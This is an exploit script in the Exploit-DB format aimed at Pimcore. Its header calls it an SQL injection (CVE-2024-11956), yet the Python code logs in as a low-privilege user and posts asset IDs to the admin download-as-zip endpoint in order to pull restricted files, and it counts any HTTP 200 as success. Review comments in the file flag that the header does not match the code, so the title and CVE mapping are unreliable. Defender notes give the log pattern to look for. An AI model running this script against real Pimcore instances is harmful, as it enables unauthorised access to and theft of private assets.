# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
#
# NOTE(review): the title and CVE line describe an SQL injection in
# customer-data-framework, but nothing below sends an SQL payload. The script
# logs in and POSTs a list of asset IDs to the admin download-as-zip endpoint,
# which is an access-control test, not an injection test. Treat the mapping
# between this code and the advisory named in the header as unverified.
#
# NOTE(review): the result check only looks at the HTTP status code. A 200
# does not show that the account lacked permission on the requested assets or
# that the body is a ZIP archive, so the "successful" message is not proof of
# a bypass on its own.
#
# Defender notes: the header lists Pimcore versions prior to 10.5.21 as
# affected. In web or application logs, the request of interest is a POST to
# /admin/asset/download-as-zip whose "ids[]" values point at assets the
# authenticated account has no view permission for.

import requests

# Placeholders: base URL of the instance under test and a low-privilege account.
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# One Session so the cookie set by the login request is reused afterwards.
session = requests.Session()
login_response = session.post(
    f"{TARGET_URL}/admin/login",
    data={"username": USERNAME, "password": PASSWORD},
)

# The login is judged purely by a marker string in the response body.
if "Login successful" not in login_response.text:
    print("[-] Authentication failed.")
else:
    print("[+] Authenticated successfully.")

    # Ask the download-as-zip endpoint for a fixed set of asset IDs.
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"],  # placeholder asset IDs
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code != 200:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
    else:
        print("[+] Exploit successful. Restricted files downloaded.")
        # The body is written as-is; it is never checked for being a ZIP.
        with open("restricted_files.zip", "wb") as zip_file:
            zip_file.write(download_response.content)